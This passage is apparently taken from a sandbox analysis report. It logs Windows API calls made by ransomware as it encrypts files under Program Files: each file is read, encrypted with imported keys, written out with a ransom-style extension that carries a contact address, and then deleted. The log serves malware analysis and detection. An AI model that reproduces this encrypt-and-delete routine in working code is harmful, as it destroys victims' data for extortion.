lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0147.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0147.987] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac31f0) returned 1 [0147.987] CryptSetKeyParam (hKey=0xac31f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0147.987] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xd0d50, lpOverlapped=0x0) returned 1 [0148.041] CryptEncrypt (in: hKey=0xac31f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xd0d60, dwBufLen=0xd0d60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xd0d60) returned 1 [0148.042] WriteFile (in: hFile=0x300, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xd0d60, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xd0d60, lpOverlapped=0x0) returned 1 [0148.057] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac33f0) returned 1 [0148.057] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.057] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0148.057] CryptDestroyKey (hKey=0xac33f0) returned 1 [0148.057] WriteFile (in: hFile=0x300, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0148.057] CryptDestroyKey (hKey=0xac31f0) returned 1 [0148.057] CloseHandle (hObject=0x2f8) returned 1 [0148.057] CloseHandle (hObject=0x300) returned 1 [0148.057] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll")) returned 1 [0148.266] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.266] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.269] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=987136) returned 1 [0148.269] CloseHandle (hObject=0x2e4) returned 1 [0148.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll")) returned 0x20 [0148.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.269] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.274] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=12448) returned 1 [0148.274] CloseHandle (hObject=0x2e4) returned 1 [0148.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll")) returned 0x20 [0148.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.275] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.275] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0148.276] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d70) returned 1 [0148.276] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.276] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x30a0, lpOverlapped=0x0) returned 1 [0148.278] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30b0, dwBufLen=0x30b0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30b0) returned 1 [0148.278] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x30b0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x30b0, lpOverlapped=0x0) returned 1 [0148.281] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2eb0) returned 1 [0148.281] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.281] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0148.281] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0148.281] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0148.281] CryptDestroyKey (hKey=0xac2d70) returned 1 [0148.281] CloseHandle (hObject=0x2e4) returned 1 [0148.281] CloseHandle (hObject=0x2f4) returned 1 [0148.282] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll")) returned 1 [0148.283] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0148.283] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=20608) returned 1 [0148.283] CloseHandle (hObject=0x2f4) returned 1 [0148.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll")) returned 0x20 [0148.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0148.284] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.284] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.284] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2df0) returned 1 [0148.284] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.284] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x5080, lpOverlapped=0x0) returned 1 [0148.290] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x5090, dwBufLen=0x5090 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x5090) returned 1 [0148.290] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x5090, lpOverlapped=0x0) returned 1 [0148.292] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0148.292] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.292] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0148.292] CryptDestroyKey (hKey=0xac3130) returned 1 [0148.292] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0148.292] CryptDestroyKey (hKey=0xac2df0) returned 1 [0148.292] CloseHandle (hObject=0x2f4) returned 1 [0148.292] CloseHandle (hObject=0x2e4) returned 1 [0148.292] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll")) returned 1 [0148.293] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.294] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=100488) returned 1 [0148.294] CloseHandle (hObject=0x2e4) returned 1 [0148.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe")) returned 0x20 [0148.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.295] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.295] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0148.295] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e70) returned 1 [0148.295] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.295] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x18888, lpOverlapped=0x0) returned 1 [0148.298] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x18890, dwBufLen=0x18890 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x18890) returned 1 [0148.298] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x18890, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x18890, lpOverlapped=0x0) returned 1 [0148.300] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2ef0) returned 1 [0148.301] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.301] CryptEncrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0148.301] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0148.301] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0148.301] CryptDestroyKey (hKey=0xac2e70) returned 1 [0148.301] CloseHandle (hObject=0x2e4) returned 1 [0148.301] CloseHandle (hObject=0x2f4) returned 1 [0148.301] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe")) returned 1 [0148.302] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0148.303] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=367216) returned 1 [0148.303] CloseHandle (hObject=0x2f4) returned 1 [0148.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll")) returned 0x20 [0148.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0148.303] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.303] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0148.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.303] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac32b0) returned 1 [0148.303] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.304] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x59a70, lpOverlapped=0x0) returned 1 [0148.605] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x59a80, dwBufLen=0x59a80 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x59a80) returned 1 [0148.606] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x59a80, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x59a80, lpOverlapped=0x0) returned 1 [0148.613] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0148.613] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0148.613] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0148.614] CryptDestroyKey (hKey=0xac3130) returned 1 [0148.614] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0148.614] CryptDestroyKey (hKey=0xac32b0) returned 1 [0148.614] CloseHandle (hObject=0x2f4) returned 1 [0148.614] CloseHandle (hObject=0x2e4) returned 1 [0148.614] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll")) returned 1 [0148.618] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.618] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.619] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2702) returned 1 [0148.619] CloseHandle (hObject=0x2e4) returned 1 [0148.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 0x20 [0148.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.619] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0148.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0148.622] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=14856) returned 1 [0148.622] CloseHandle (hObject=0x2e4) returned 1 [0148.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc")) returned 0x20 [0148.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.623] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: 